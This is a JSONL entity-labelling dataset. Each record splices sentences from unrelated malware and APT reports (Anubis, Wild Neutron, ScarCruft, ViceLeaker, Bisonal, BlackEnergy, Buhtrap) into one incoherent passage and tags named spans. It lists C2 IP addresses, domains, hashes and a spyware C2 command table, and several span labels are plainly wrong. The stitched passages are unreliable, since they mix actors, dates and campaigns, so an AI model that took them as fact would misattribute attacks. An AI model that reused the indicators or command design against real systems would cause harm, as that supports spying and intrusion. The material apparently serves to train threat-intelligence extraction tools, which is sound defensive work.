{"text": "The keylogger can track three different events ( Figure 5 ) : TYPE_VIEW_CLICKED Represents the event of clicking on a View-like Button , CompoundButton , etc . The latter was one of at least three law firms Butterfly has targeted over the past three years . As with their previous fake company \u201c Combi Security \u201d , we are confident that they continue to create new personas for use in either targeting or recruiting under a \u201c new \u201d brand , \u201c IPC \u201d . In fact , this chain also leads to NetSupport RAT .", "spans": [{"start": 197, "end": 206, "label": "Organization"}, {"start": 207, "end": 216, "label": "Organization"}, {"start": 296, "end": 310, "label": "Organization"}, {"start": 442, "end": 445, "label": "Organization"}, {"start": 485, "end": 499, "label": "System"}]}
{"text": "TYPE_VIEW_FOCUSED Represents the event of setting input focus of a View . In many attacks , the group has succeeded in compromising Microsoft Exchange or Lotus Domino email servers in order to intercept company emails and possibly use them to send counterfeit emails . AveMaria : 185.61.138.249 tain.warzonedns.com noreply377.ddns.net 185.162.131.97 91.192.100.62 server.mtcc.me doddyfire.dyndns.org 212.8.240.116 168.167.45.162 toekie.ddns.net warmaha.warzonedns.com . As a result , we decided to call this variant FakeSG .", "spans": [{"start": 132, "end": 150, "label": "System"}, {"start": 154, "end": 180, "label": "System"}, {"start": 269, "end": 277, "label": "Malware"}, {"start": 280, "end": 294, "label": "Indicator"}, {"start": 295, "end": 314, "label": "Indicator"}, {"start": 315, "end": 334, "label": "Indicator"}, {"start": 335, "end": 349, "label": "Indicator"}, {"start": 350, "end": 363, "label": "Indicator"}, {"start": 364, "end": 378, "label": "Indicator"}, {"start": 379, "end": 399, "label": "Indicator"}, {"start": 400, "end": 413, "label": "Indicator"}, {"start": 414, "end": 428, "label": "Indicator"}, {"start": 429, "end": 444, "label": "Indicator"}, {"start": 445, "end": 467, "label": "Indicator"}, {"start": 516, "end": 522, "label": "Malware"}]}
{"text": "TYPE_VIEW_TEXT_CHANGED Represents the event of changing the text of an EditText . A powerful threat actor known as \" Wild Neutron \" ( also known as \" Jripbot \" and \" Morpho \" ) has been active since at least 2011 , infecting high profile companies for several years by using a combination of exploits , watering holes and multi-platform malware . CopyPaste : digi-cert.org somtelnetworks.com geotrusts.com secureclientupdate.com digicertweb.com sport-pesa.org itaxkenya.com businessdailyafrica.net infotrak-research.com nairobiwired.com k-24tv.com . 2023 - 07 - 19 Update : On June 5 , @SecurityAura described an unknown campaign using .hta payloads disguised as driver updates .", "spans": [{"start": 150, "end": 157, "label": "Organization"}, {"start": 166, "end": 172, "label": "Organization"}, {"start": 225, "end": 247, "label": "Organization"}, {"start": 347, "end": 356, "label": "Organization"}, {"start": 359, "end": 372, "label": "Indicator"}, {"start": 373, "end": 391, "label": "Indicator"}, {"start": 392, "end": 405, "label": "Indicator"}, {"start": 406, "end": 428, "label": "Indicator"}, {"start": 429, "end": 444, "label": "Indicator"}, {"start": 445, "end": 459, "label": "Indicator"}, {"start": 460, "end": 473, "label": "Indicator"}, {"start": 474, "end": 497, "label": "Indicator"}, {"start": 498, "end": 519, "label": "Indicator"}, {"start": 520, "end": 536, "label": "Indicator"}, {"start": 537, "end": 547, "label": "Indicator"}, {"start": 586, "end": 599, "label": "Organization"}]}
{"text": "Figure 5 \u2013 Keylogger component Figure 6 shows one of the most noteworthy functions of Anubis : its ransomware module . Based on the profile of the victims and the type of information targeted by the attackers , Symantec believes that Butterfly is financially motivated , stealing information it can potentially profit from . FIN7 S-APT/GRIFFON : hpservice-cdn.com realtek-cdn.com logitech-cdn.com pci-cdn.com appleservice-cdn.com servicebing-cdn.com . On June 22 , @AnFam17 spotted the same fake browser update leveraging URL shortcuts .", "spans": [{"start": 86, "end": 92, "label": "Malware"}, {"start": 211, "end": 219, "label": "Organization"}, {"start": 325, "end": 343, "label": "Malware"}, {"start": 346, "end": 363, "label": "Indicator"}, {"start": 364, "end": 379, "label": "Indicator"}, {"start": 380, "end": 396, "label": "Indicator"}, {"start": 397, "end": 408, "label": "Indicator"}, {"start": 409, "end": 429, "label": "Indicator"}, {"start": 430, "end": 449, "label": "Indicator"}, {"start": 465, "end": 473, "label": "Organization"}]}
{"text": "The malware searches both internal and external storage and encrypts them using RC4 . Wild Neutron hit the spotlight in 2013 , when it successfully infected companies such as Apple , Facebook , Twitter and Microsoft . ScarCruft continues to evolve, introduces Bluetooth harvester . Both of these campaigns use a similar structure with compromised WordPress sites hosting the lure shortcuts and a WebDav server that loads NetSupport RAT .", "spans": [{"start": 175, "end": 180, "label": "Organization"}, {"start": 183, "end": 191, "label": "Organization"}, {"start": 194, "end": 201, "label": "Organization"}, {"start": 206, "end": 215, "label": "Organization"}, {"start": 218, "end": 227, "label": "Organization"}, {"start": 260, "end": 269, "label": "System"}, {"start": 347, "end": 362, "label": "System"}, {"start": 396, "end": 409, "label": "System"}]}
{"text": "It adds the file extension .AnubisCrypt to each encrypted file and sends it to the C2 . Wild Neutron 's attacks in 2015 uses a stolen code signing certificate belonging to Taiwanese electronics maker Acer and an unknown Flash Player exploit . After publishing our initial series of blogposts back in 2016 , we have continued to track the ScarCruft threat actor . RussianPanda ( @AnFam17 ) named the URL shortcut campaign RogueRaticate .", "spans": [{"start": 27, "end": 39, "label": "Indicator"}, {"start": 88, "end": 100, "label": "Organization"}, {"start": 127, "end": 158, "label": "System"}, {"start": 182, "end": 193, "label": "Organization"}, {"start": 220, "end": 240, "label": "Vulnerability"}, {"start": 338, "end": 347, "label": "Organization"}, {"start": 363, "end": 375, "label": "Organization"}, {"start": 421, "end": 434, "label": "Malware"}]}
{"text": "Figure 6 \u2013 Ransomware component Anubis has been known to utilize Twitter or Telegram to retrieve the C2 address and this sample is no exception ( Figure 7 ) . During the 2013 attacks , the Wild Neutron actor successfully compromised and leveraged the website www.iphonedevsdk.com , which is an iPhone developers forum . ScarCruft is a Korean-speaking and allegedly state-sponsored threat actor that usually targets organizations and companies with links to the Korean peninsula . FakeSG has different browser templates depending on which browser the victim is running .", "spans": [{"start": 32, "end": 38, "label": "Malware"}, {"start": 65, "end": 72, "label": "Organization"}, {"start": 76, "end": 84, "label": "Organization"}, {"start": 320, "end": 329, "label": "Organization"}, {"start": 480, "end": 486, "label": "Malware"}]}
{"text": "Figure 7 \u2013 C2 As seen in Figure 8 , this version of Anubis is built to run on several iterations of the Android operating system , dating back to version 4.0.3 , which was released in 2012 . Wild Neutron 's attack took advantage of a Java zero-day exploit and used hacked forums as watering holes . We recently discovered some interesting telemetry on this actor , and decided to dig deeper into ScarCruft \u2019s recent activity . The themed \" updates \" look very professional and are more up to date than its SocGholish counterpart .", "spans": [{"start": 52, "end": 58, "label": "Malware"}, {"start": 104, "end": 111, "label": "System"}, {"start": 191, "end": 203, "label": "Organization"}, {"start": 234, "end": 255, "label": "Vulnerability"}, {"start": 396, "end": 405, "label": "Organization"}, {"start": 506, "end": 516, "label": "Malware"}]}
{"text": "Figure 8 \u2013 Android requirements Android malware has been around for many years and will be with us for the foreseeable future . While the group used watering hole attacks in 2013 , it's still unclear how victims get redirected to the exploitation kits in the new 2014-2015 attacks . This shows that the actor is still very active and constantly trying to elaborate its attack tools . Compromised websites ( WordPress appears to be the top target ) are injected with a code snippet that replaces the current webpage with the aforementioned fake updates templates .", "spans": [{"start": 11, "end": 18, "label": "System"}, {"start": 32, "end": 39, "label": "System"}, {"start": 384, "end": 404, "label": "System"}, {"start": 407, "end": 416, "label": "Organization"}]}
{"text": "Users who have configured their Android mobile device to receive work-related emails and allow installation of unsigned applications face the most risk of compromise . Wild Neutron 's tools include a password harvesting trojan , a reverse-shell backdoor and customized implementations of OpenSSH , WMIC and SMB . Based on our telemetry , we can reassemble ScarCruft \u2019s binary infection procedure . The source code is loaded from one of several domains impersonating Google ( google - analytiks[.]com ) or Adobe ( updateadobeflash[.]website ): That code contains all the web elements ( images , fonts , text ) needed to render the fake browser update page .", "spans": [{"start": 32, "end": 39, "label": "System"}, {"start": 168, "end": 180, "label": "Organization"}, {"start": 200, "end": 226, "label": "System"}, {"start": 231, "end": 253, "label": "System"}, {"start": 258, "end": 295, "label": "System"}, {"start": 298, "end": 302, "label": "System"}, {"start": 307, "end": 310, "label": "System"}, {"start": 356, "end": 365, "label": "Organization"}, {"start": 466, "end": 472, "label": "System"}, {"start": 505, "end": 510, "label": "System"}]}
{"text": "APK files will not natively open in an environment other than an Android device . Instead of Flash exploits , older Wild Neutron exploitation and watering holes used what was a Java zero-day at the end of 2012 and the beginning of 2013 , detected by Kaspersky Lab products as Exploit.Java.CVE-2012-3213.b . It used a multi-stage binary infection to update each module effectively and evade detection . We should note that SocGholish used to retrieve media files from separate web requests until more recently when it started using self - contained Base64 encoded images .", "spans": [{"start": 65, "end": 72, "label": "System"}, {"start": 93, "end": 107, "label": "Vulnerability"}, {"start": 177, "end": 190, "label": "Vulnerability"}, {"start": 250, "end": 263, "label": "Organization"}, {"start": 276, "end": 304, "label": "Vulnerability"}, {"start": 422, "end": 432, "label": "Malware"}]}
{"text": "With the increased use of Android phones in business environments , it is important to defend against these threats by ensuring devices are kept current with the latest updates . The victims for the 2014-2015 versions are generally IT and real estate/investment companies and in both cases , a small number of computers have been infected throughout Wild Neutron . In addition , we analyzed the victims of this campaign and spotted an interesting overlap of this campaign with another APT actor known as DarkHotel . There are different installation flows for this campaign , but we will focus on the one that uses a URL shortcut .", "spans": [{"start": 26, "end": 33, "label": "System"}, {"start": 232, "end": 234, "label": "Organization"}, {"start": 239, "end": 271, "label": "Organization"}, {"start": 350, "end": 362, "label": "Organization"}, {"start": 504, "end": 513, "label": "Organization"}, {"start": 564, "end": 572, "label": "Organization"}]}
{"text": "Limiting app installations on corporate devices , as well as ensuring that applications are created by trusted developers on official marketplaces , can help in reducing the risk of infection as well . Wild Neutron 's targeting of major IT companies , spyware developers ( FlexiSPY ) , jihadist forums ( the \" Ansar Al-Mujahideen English Forum \" ) and Bitcoin companies indicate a flexible yet unusual mindset and interests . The ScarCruft group uses common malware delivery techniques such as spear phishing and Strategic Web Compromises ( SWC ) . This shorcut uses the WebDav HTTP protocol extension to retrieve the file launcher-upd.hta from a remote server : This heavily obfuscated script is responsible for the execution of PowerShell that downloads the final malware payload ( NetSupport RAT ) .", "spans": [{"start": 202, "end": 214, "label": "Organization"}, {"start": 237, "end": 249, "label": "Organization"}, {"start": 252, "end": 270, "label": "Organization"}, {"start": 273, "end": 281, "label": "Organization"}, {"start": 286, "end": 301, "label": "Organization"}, {"start": 310, "end": 343, "label": "Organization"}, {"start": 352, "end": 369, "label": "Organization"}, {"start": 430, "end": 439, "label": "Organization"}, {"start": 663, "end": 781, "label": "Malware"}, {"start": 784, "end": 798, "label": "Malware"}]}
{"text": "ViceLeaker Operation : mobile espionage targeting Middle East 26 JUN 2019 In May 2018 , we discovered a campaign targeting dozens of mobile Android devices belonging to Israeli citizens . We continue to track the Wild Neutron group , which is still active as of June 2015 . As in Operation Daybreak , this actor performs sophisticated attacks using a zero-day exploit . Malwarebytes 's EDR shows the full attack chain ( please click to enlarge ): The NetSupport RAT files are hosted on the same compromised WordPress site used earlier to download the Internet shortcut .", "spans": [{"start": 0, "end": 10, "label": "Malware"}, {"start": 140, "end": 147, "label": "System"}, {"start": 213, "end": 231, "label": "Organization"}, {"start": 351, "end": 359, "label": "Malware"}, {"start": 370, "end": 385, "label": "Organization"}, {"start": 451, "end": 465, "label": "Malware"}]}
{"text": "Kaspersky spyware sensors caught the signal of an attack from the device of one of the victims ; and a hash of the APK involved ( Android application ) was tagged in our sample feed for inspection . A ransomware variant dubbed PyLocky was observed in September 2018 being distributed by a phishing campaign using an invoicing theme . However , sometimes using public exploit code is quicker and more effective for malware authors . The RAT 's main binary is launched from \" C:\\Users\\%username%\\AppData\\Roaming\\BranScale\\client32.exe \" .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 130, "end": 137, "label": "System"}, {"start": 227, "end": 234, "label": "System"}]}
{"text": "Once we looked into the file , we quickly found out that the inner-workings of the APK included a malicious payload , embedded in the original code of the application . PyLocky was found to be targeting entities in France and Germany . We witnessed this actor extensively testing a known public exploit during its preparation for the next campaign . Fake browser updates are a very common decoy used by malware authors .", "spans": [{"start": 169, "end": 176, "label": "System"}]}
{"text": "This was an original spyware program , designed to exfiltrate almost all accessible information . Fxmsp specialize in breaching highly secure protected networks to access private corporate and government information . In order to deploy an implant for the final payload , ScarCruft uses a multi-stage binary infection scheme . In addition to SocGholish , the Domen toolkit was a well - built framework that emerged in 2019 while another campaign known as sczriptzzbn dropped SolarMarker leading to the NetSupport RAT in both cases .", "spans": [{"start": 98, "end": 103, "label": "Organization"}, {"start": 272, "end": 281, "label": "Organization"}, {"start": 342, "end": 352, "label": "Malware"}, {"start": 359, "end": 372, "label": "Malware"}, {"start": 455, "end": 466, "label": "Malware"}, {"start": 475, "end": 486, "label": "Malware"}, {"start": 502, "end": 516, "label": "Malware"}]}
{"text": "During the course of our research , we noticed that we were not the only ones to have found the operation . Fxmsp is a hacking collective that has operated in various top-tier Russian- and English-speaking underground communities since 2017 . As a rule , the initial dropper is created by the infection procedure . Initial access brokers use tools like NetSupport RAT to gather information and perform additional actions on victims of interest .", "spans": [{"start": 108, "end": 113, "label": "Organization"}, {"start": 353, "end": 367, "label": "System"}]}
{"text": "Researchers from Bitdefender also released an analysis of one of the samples in a blogpost . Throughout 2017 and 2018 , Fxmsp established a network of trusted proxy resellers to promote their breaches on the criminal underground . One of the most notable functions of the initial dropper is to bypass Windows UAC ( User Account Control ) in order to execute the next payload with higher privileges . Stolen credentials can be resold to other threat actors tied to ransomware gangs .", "spans": [{"start": 17, "end": 28, "label": "System"}, {"start": 120, "end": 125, "label": "Organization"}, {"start": 301, "end": 308, "label": "System"}, {"start": 309, "end": 312, "label": "System"}, {"start": 315, "end": 335, "label": "System"}]}
{"text": "Although something had already been published , we decided to do something different with the data we acquired . On April 24 , 2019 , Fxmsp claimed to have secured access to three leading antivirus companies . This malware uses the public privilege escalation exploit code CVE-2018-8120 or UACME which is normally used by legitimate red teams . We will continue to monitor these campaigns and in particular SocGholish to see if the web delivery landscape changes .", "spans": [{"start": 134, "end": 139, "label": "Organization"}, {"start": 188, "end": 207, "label": "Organization"}, {"start": 273, "end": 286, "label": "Vulnerability"}, {"start": 290, "end": 295, "label": "Vulnerability"}, {"start": 407, "end": 417, "label": "Malware"}]}
{"text": "The following month , we released a private report on our Threat Intelligence Portal to alert our clients about this newly discovered operation and began writing YARA rules in order to catch more samples . According to the Fxmsp , they worked tirelessly for the first quarter of 2019 to breach these companies and finally succeeded and obtained access to the companies' internal networks . Afterwards , the installer malware creates a downloader and a configuration file from its resource and executes it . Malwarebytes customers are protected as we detect the infrastructure and final payload used in these attacks .", "spans": [{"start": 407, "end": 416, "label": "System"}, {"start": 507, "end": 519, "label": "Organization"}]}
{"text": "We decided to call the operation \u201c ViceLeaker \u201d , because of strings and variables in its code . Booz Allen Hamilton in 2014 and AhnLab in 2015 reported on Bisonal using a simple XOR cipher to hide the C2 address strings in the body . For example , Bisonal malware in 2012 used send() and recv() APIs to communicate with its C2 This Bisonal variant used in the latest attack communicates with one of the following hard-coded C2 addresses by using the HTTP POST method on TCP port 443 . The downloader malware uses the configuration file and connects to the C2 server to fetch the next payload . Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected .", "spans": [{"start": 35, "end": 45, "label": "Malware"}, {"start": 97, "end": 116, "label": "Organization"}, {"start": 129, "end": 135, "label": "Organization"}, {"start": 249, "end": 264, "label": "Organization"}, {"start": 333, "end": 340, "label": "Malware"}, {"start": 490, "end": 500, "label": "System"}, {"start": 557, "end": 559, "label": "System"}]}
{"text": "Mobile ViceLeaker The following table shows meta information on the observed samples , including compiler timestamps : MD5 Package Compiler C2 51df2597faa3fce38a4c5ae024f97b1c com.xapps.SexGameForAdults dexlib 2.x 188.165.28 [ . Previous reports have discussed Bisonal malware used in attacks against Japan , South Korea and Russia . In order to evade network level detection , the downloader uses steganography .", "spans": [{"start": 7, "end": 17, "label": "Malware"}, {"start": 143, "end": 175, "label": "Indicator"}, {"start": 176, "end": 202, "label": "Indicator"}, {"start": 214, "end": 228, "label": "Indicator"}, {"start": 261, "end": 276, "label": "Malware"}, {"start": 382, "end": 392, "label": "System"}]}
{"text": "] 251 2d108ff3a735dea1d1fdfa430f37fab2 com.psiphon3 dexlib 2.x 188.165.49 [ . This particular sample we found targeted an organization in Russia and there is a specific system language check for Cyrillic and no others . The downloaded payload is an image file , but it contains an appended malicious payload to be decrypted .", "spans": [{"start": 6, "end": 38, "label": "Indicator"}, {"start": 39, "end": 51, "label": "Indicator"}, {"start": 63, "end": 77, "label": "Indicator"}, {"start": 94, "end": 100, "label": "Malware"}]}
{"text": "] 205 7ed754a802f0b6a1740a99683173db73 com.psiphon3 dexlib 2.x 188.165.49 [ . If it's Cyrillic and the command to the shell is not \u2018ipconfig\u2019 , the threat converts the command result text encoding from Cyrillic to UTF-16 . The final payload created by the aforementioned process is a well known backdoor , also known as ROKRAT by Cisco Talos .", "spans": [{"start": 6, "end": 38, "label": "Indicator"}, {"start": 39, "end": 51, "label": "Indicator"}, {"start": 63, "end": 77, "label": "Indicator"}, {"start": 81, "end": 85, "label": "Malware"}, {"start": 86, "end": 94, "label": "System"}, {"start": 214, "end": 220, "label": "System"}, {"start": 320, "end": 326, "label": "Malware"}, {"start": 330, "end": 341, "label": "Organization"}]}
{"text": "] 205 3b89e5cd49c05ce6dc681589e6c368d9 ir.abed.dastan dexlib 2.x 185.141.60 [ . Similar to the Bisonal variant targeting the Russian organization , this sample was also disguised as PDF document . This cloud service-based backdoor contains many features .", "spans": [{"start": 6, "end": 38, "label": "Indicator"}, {"start": 39, "end": 53, "label": "Indicator"}, {"start": 65, "end": 79, "label": "Indicator"}, {"start": 95, "end": 102, "label": "Malware"}]}
{"text": "] 213 To backdoor legitimate applications , attackers used a Smali injection technique \u2013 a type of injection that allows attackers to disassemble the code of original app with the Baksmali tool , add their malicious code , and assemble it with Smali . The contents of the decoy PDF is a job descriptions with the South Korean Coast Guard . One of its main functions is to steal information .", "spans": [{"start": 268, "end": 281, "label": "Malware"}, {"start": 326, "end": 337, "label": "Organization"}]}
{"text": "As a result , due to such an unusual compilation process , there were signs in the dex file that point to dexlib , a library used by the Smali tool to assemble dex files . The installed EXE file is almost exactly the same as the DLL version of Bisonal variant used against the Russian organization . Upon execution , this malware creates 10 random directory paths and uses them for a specially designated purpose .", "spans": [{"start": 176, "end": 194, "label": "Malware"}, {"start": 244, "end": 259, "label": "Malware"}]}
{"text": "Original code of the APK on the left , versus injected APK on the right The analysis of the APK was rather interesting , because some of the actions were very common spyware features , such as the exfiltration of SMS messages , call logs and other data . The targets are military or defense industry in particular countries , it used DDNS for C2 servers , and tracked connections from their victims by using target or campaign codes , as well as disguising the malware as document file , and using a dropper to install the malware and decoy file . The malware creates 11 threads simultaneously : six threads are responsible for stealing information from the infected host , and five threads are for forwarding collected data to four cloud services ( Box , Dropbox , Pcloud and Yandex ) .", "spans": [{"start": 500, "end": 507, "label": "System"}, {"start": 750, "end": 753, "label": "System"}, {"start": 756, "end": 763, "label": "System"}, {"start": 766, "end": 772, "label": "System"}, {"start": 777, "end": 783, "label": "System"}]}
{"text": "However , in addition to the traditional functionality , there were also backdoor capabilities such as upload , download , delete files , camera takeover and record surrounding audio . A previous campaign of this APT group was uncovered by Talos in June 2017 , and since then very little of this operation was seen in the wild . When uploading stolen data to a cloud service , it uses predefined directory path such as /english , /video or /scriptout .", "spans": [{"start": 240, "end": 245, "label": "Organization"}]}
{"text": "The malware uses HTTP for communication with the C2 server for command handling and data exfiltration . ined in the archive is called DriverInstallerU.exe but its metadata shows that its original name is Interenet Assistant.exe . The ScarCruft group keeps expanding its Exfiltration targets to steal further information from infected hosts and continues to create tools for additional data Exfiltration .", "spans": [{"start": 134, "end": 154, "label": "Malware"}, {"start": 204, "end": 227, "label": "Malware"}, {"start": 234, "end": 243, "label": "Organization"}]}
{"text": "Here is a command and control protocol fragment : Commands from C2 server parsing In total , the malicious APK handles 16 different commands : Command Endpoint Description 1 reqsmscal.php Send specified SMS message 2 reqsmscal.php Call specified number 3 reqsmscal.php Exfiltrate device info , such as phone model and OS version 4 reqsmscal.php Exfiltrate a list of all installed applications 5 reqsmscal.php Exfiltrate default browser history ( limited to a given date ) 6 reqsmscal.php After reviewing all the malware functionalities , we are confident in saying that the attackers look for victims who answer well-defined characteristics and believe that further stages of the attack are delivered only to those who fit the specific victim profile . We also discovered an interesting piece of rare malware created by this threat actor \u2013 a Bluetooth device harvester .", "spans": [{"start": 174, "end": 187, "label": "Indicator"}, {"start": 217, "end": 230, "label": "Indicator"}, {"start": 255, "end": 268, "label": "Indicator"}, {"start": 331, "end": 344, "label": "Indicator"}, {"start": 395, "end": 408, "label": "Indicator"}, {"start": 474, "end": 487, "label": "Indicator"}, {"start": 574, "end": 583, "label": "Organization"}, {"start": 593, "end": 611, "label": "Organization"}, {"start": 842, "end": 851, "label": "System"}]}
{"text": "Exfiltrate Chrome browser history ( limited to a given date ) 7 reqsmscal.php Exfiltrate memory card file structure 8 reqsmscal.php Record surrounding sound for 80 seconds 1 reqcalllog.php Exfiltrate all call logs 2 reqcalllog.php Exfiltrate all SMS messages 3 reqcalllog.php Upload specified file from the device to the C2 4 reqcalllog.php Download file from specified URL and save on device 5 reqcalllog.php Delete specified file 6,7,8 reqcalllog.php Commands not yet In this sample , however , the module names were changed from actors and characters\u2019 names to car models , namely BMW_x1\u201d , BMW_x2\u201d and up to BMW_x8\u201d . This malware is responsible for stealing Bluetooth device information .", "spans": [{"start": 64, "end": 77, "label": "Indicator"}, {"start": 118, "end": 131, "label": "Indicator"}, {"start": 174, "end": 188, "label": "Indicator"}, {"start": 216, "end": 230, "label": "Indicator"}, {"start": 261, "end": 275, "label": "Indicator"}, {"start": 326, "end": 340, "label": "Indicator"}, {"start": 395, "end": 409, "label": "Indicator"}, {"start": 438, "end": 452, "label": "Indicator"}, {"start": 584, "end": 591, "label": "Malware"}, {"start": 594, "end": 601, "label": "Malware"}, {"start": 612, "end": 619, "label": "Malware"}, {"start": 663, "end": 672, "label": "System"}]}
{"text": "implemented 9 reqcalllog.php Take photo ( muted audio ) with rear camera , send to C2 10 reqcalllog.php Take photo ( muted audio ) with front camera , send to C2 All observed samples with Smali injections were signed by the same debug certificate ( 0x936eacbe07f201df ) . But , thanks to the attackers known affection for decoy documents that pose as news summaries , we were able to date the campaign back to March 2018 . It is fetched by a downloader , and collects information directly from the infected host .", "spans": [{"start": 14, "end": 28, "label": "Indicator"}, {"start": 89, "end": 103, "label": "Indicator"}, {"start": 292, "end": 301, "label": "Organization"}]}
{"text": "As we know from our investigation , traces of the first development activities were found at the end of 2016 , but the main distribution campaign began in 2018 ( end of 2017 ) . With the experience gained from the APT attack that began in March 2017 , it seems this campaign has evolved into an attack with new capabilities , and an even more specific target , over a year later . This malware uses Windows Bluetooth APIs to find information on connected Bluetooth devices and saves the following information .", "spans": [{"start": 399, "end": 406, "label": "System"}, {"start": 407, "end": 416, "label": "System"}, {"start": 455, "end": 464, "label": "System"}]}
{"text": "Based on our detection statistics , the main infection vector is the spread of Trojanized applications directly to victims via Telegram and WhatsApp messengers . These unknown actors continued launching DDoS attacks over the next few years . We have found several victims of this campaign , based on our telemetry \u2013 investment and trading companies in Vietnam and Russia .", "spans": [{"start": 168, "end": 182, "label": "Organization"}]}
{"text": "There are the following relevant detection paths ( the last one is an alternative Telegram client \u2013 \u201c Telegram X \u201c ) : Name Detection path Sex Game For Adults 18.apk /storage/emulated/0/WhatsApp/Media/WhatsApp Documents/ 4_6032967490689041387.apk /storage/emulated/0/Telegram/Telegram Documents/ Psiphon-v91.apk /storage/emulated/0/Android/data/org.thunderdog.challegram/files/documents/ Backdoored Open Source During the course For simplicity , Kaspersky is calling them the BlackEnergy APT group . We believe they may have some links to North Korea , which may explain why ScarCruft decided to closely monitor them .", "spans": [{"start": 159, "end": 165, "label": "Indicator"}, {"start": 166, "end": 295, "label": "Indicator"}, {"start": 296, "end": 311, "label": "Indicator"}, {"start": 312, "end": 387, "label": "Indicator"}, {"start": 446, "end": 455, "label": "Organization"}, {"start": 575, "end": 584, "label": "Organization"}]}
{"text": "of our analysis , we also found samples sharing code with the ViceLeaker malware , in particular they shared a delimiter that was used in both cases to parse commands from the C2 server . Since the middle of 2015 , one of the preferred attack vectors for BlackEnergy in Ukraine has been Excel documents with macros that drop the Trojan to disk if the user chooses to run the script in the document . ScarCruft also attacked a diplomatic agency in Hong Kong , and another diplomatic agency in North Korea .", "spans": [{"start": 62, "end": 72, "label": "Malware"}, {"start": 255, "end": 266, "label": "Organization"}, {"start": 400, "end": 409, "label": "Organization"}]}
{"text": "This would be a very unusual coincidence . A very good analysis and overview of the BlackEnergy attacks in Ukraine throughout 2014 and 2015 was published by the Ukrainian security firm Cys Centrum the text is only available in Russian for now , but can be read via Google Translate . It appears ScarCruft is primarily targeting intelligence for political and diplomatic purposes .", "spans": [{"start": 185, "end": 196, "label": "Organization"}, {"start": 295, "end": 304, "label": "Organization"}]}
{"text": "Even when a false flag might also be a possibility , we consider this to be unlikely . The earliest signs of destructive payloads with BlackEnergy go back as far as June 2014 . We discovered one victim from Russia that also triggered a malware detection while staying in North Korea in the past .", "spans": [{"start": 135, "end": 146, "label": "Organization"}]}
{"text": "The samples sharing this overlap are modified versions of an open source Jabber/XMPP client called \u201c Conversations \u201d with some code additions . BlackEnergy is a highly dynamic threat actor and the current attacks in Ukraine indicate that destructive actions are on their main agenda , in addition to compromising industrial control installations and espionage activities . The fact that this victim visits North Korea makes its special and suggests that it may have valuable information about North Korean affairs .", "spans": [{"start": 73, "end": 84, "label": "System"}, {"start": 144, "end": 155, "label": "Organization"}]}
{"text": "The legitimate version of this app is also available on Google Play . Kaspersky will continue to monitor the BlackEnergy attacks in Ukraine and update our readers with more data when available . ScarCruft infected this victim on September 21, 2018 .", "spans": [{"start": 56, "end": 67, "label": "System"}, {"start": 70, "end": 79, "label": "Organization"}, {"start": 109, "end": 120, "label": "Organization"}, {"start": 195, "end": 204, "label": "Organization"}]}
{"text": "The Conversations modified samples differ from the original one in the getKnownHosts method that was modified to replace the main XMPP host with the attackers \u2019 C2 server : It appears that the attackers were using a specific C2 for the use of that app . From Buhtrap perpetrating cybercrime for financial gain , its toolset has been expanded with malware used to conduct espionage in Eastern Europe and Central Asia . But before the ScarCruft infection , however , another APT group also targeted this victim with the host being infected with GreezeBackdoor on March 26, 2018 .", "spans": [{"start": 130, "end": 134, "label": "System"}, {"start": 259, "end": 266, "label": "Organization"}, {"start": 433, "end": 442, "label": "Organization"}, {"start": 543, "end": 557, "label": "Malware"}]}
{"text": "Another important modification is in the message transfer process : With this modification , an application sends device location coordinates with every message . Throughout our tracking , we've seen this group deploy its main backdoor as well as other tools against various victims , but June 2019 was the first time we saw the Buhtrap group use a zero-day exploit as part of a campaign . GreezeBackdoor is a tool of the DarkHotel APT group , which we have previously written about .", "spans": [{"start": 189, "end": 194, "label": "Organization"}, {"start": 200, "end": 210, "label": "Organization"}, {"start": 329, "end": 336, "label": "Organization"}, {"start": 390, "end": 404, "label": "Malware"}, {"start": 422, "end": 431, "label": "Organization"}]}
{"text": "There are also many other modifications , fully described in our private report . In that case , we observed Buhtrap using a local privilege escalation exploit , CVE-2019-1132 , against one of its victims . In addition , this victim was also attacked by the Konni malware on 03 April 2018 .", "spans": [{"start": 109, "end": 116, "label": "Organization"}, {"start": 162, "end": 175, "label": "Vulnerability"}, {"start": 258, "end": 263, "label": "Malware"}]}
{"text": "In addition , we did not see traces of the Smali injection . However , as the shift in targets occurred before the source code leak , we assess with high confidence that the same people behind the first Buhtrap malware attacks against businesses and banks are also involved in targeting governmental institutions . The Konni malware was disguised as a North Korean news item in a weaponized documents ( the name of the document was \u201c Why North Korea slams South Korea \u2019s recent defense talks with U.S-Japan.zip \u201d ) This is not the first time we have seen an overlap of ScarCruft and DarkHotel actors .", "spans": [{"start": 203, "end": 210, "label": "Organization"}, {"start": 235, "end": 245, "label": "Organization"}, {"start": 250, "end": 255, "label": "Organization"}, {"start": 287, "end": 312, "label": "Organization"}, {"start": 319, "end": 324, "label": "Malware"}, {"start": 497, "end": 510, "label": "Indicator"}, {"start": 569, "end": 578, "label": "Organization"}, {"start": 583, "end": 592, "label": "Organization"}]}
{"text": "In this case we found traces of dx/dexmerge compilers , which means that , this time , the attackers just imported the original source code into an Android IDE ( such as Android Studio , for instance ) and compiled it with their own modifications . When Buhtrap was targeting businesses , the decoy documents would typically be contracts or invoices . Members from our team have already presented on the conflict of these two threat actors at security conferences .", "spans": [{"start": 148, "end": 155, "label": "System"}, {"start": 170, "end": 184, "label": "System"}, {"start": 254, "end": 261, "label": "Organization"}, {"start": 276, "end": 286, "label": "Organization"}]}
{"text": "In addition to adding the code , the attackers also changed the icon and package name . The Buhtrap group is well known for its targeting of financial institutions and businesses in Russia . We have also shared more details with our threat intelligence customers in the past .", "spans": [{"start": 92, "end": 99, "label": "Organization"}, {"start": 141, "end": 163, "label": "Organization"}]}
{"text": "We do not know why , but we suspect that it was an attempt to hide the origin of the application . Figure 2 is a typical example of a generic invoice the group used in a campaign in 2014 . They are both Korean-speaking threat actors and sometimes their victimology overlaps .", "spans": [{"start": 154, "end": 159, "label": "Organization"}]}
{"text": "Conversations-based app mimics Telegram messenger Even when we originally thought this was a backdoored version of the Conversations app , used to infect victims , we didn\u00b4t discovered anything malicious in it . When the group's focus shifted to banks , the decoy documents were related to banking system regulations or advisories from FinCERT , an organization created by the Russian government to provide help and guidance to its financial institutions . But both group seem to have different TTPs ( Tactics , Techniques and Procedures ) and it leads us to believe that one group regularly lurks in the other \u2019s shadow .", "spans": [{"start": 31, "end": 49, "label": "System"}, {"start": 221, "end": 228, "label": "Organization"}, {"start": 336, "end": 343, "label": "Organization"}]}
